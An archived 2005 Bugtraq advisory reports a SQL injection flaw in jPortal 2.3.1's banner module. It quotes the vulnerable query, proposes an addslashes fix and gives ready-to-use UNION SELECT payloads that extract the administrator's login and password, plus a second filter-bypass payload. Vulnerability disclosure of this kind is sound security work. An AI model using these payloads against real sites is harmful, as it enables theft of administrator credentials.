| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Date: Mon, 11 Apr 2005 23:28:28 +0200 From: "Marcin \"CiNU5\" Krupowicz" <marcin.krupowicz@...il.com> To: bugtraq@...urityfocus.com Subject: Sql injection in jPortal version 2.3.1 (module banner) Hello BugTraq, I've found possibility to inject sql code in jPortal version 2.3.1, in module "banner" (module/banner.inc.php). Bug is in these lines of code: [code] $query = "SELECT * FROM $bann_a_tbl WHERE title='$haslo' ORDER BY id DESC"; [/code] - line 192. There is unfiltered variable $haslo. In order to patch this code just do this: [code] $haslo = addslashes($haslo); $query = "SELECT * FROM $bann_a_tbl WHERE title='$haslo' ORDER BY id DESC"; [/code] [exploit] go to http://[victim]/jportal/banner.php and try this: ' UNION SELECT NULL, nick, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL from admins where '1=1 and then: ' UNION SELECT NULL, pass, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL from admins where '1=1 After that, You gain login and password of administrator. [/exploit] [exploit2] try to inject this code: ' or id='x x - banner id After that, You can see statistics of not banners, to which you haven't got passwords. [/exploit2] Vendor (http://jportal2.com) has been informed already. -- Best regards, Marcin "CiNU5" Krupowicz
Powered by blists - more mailing lists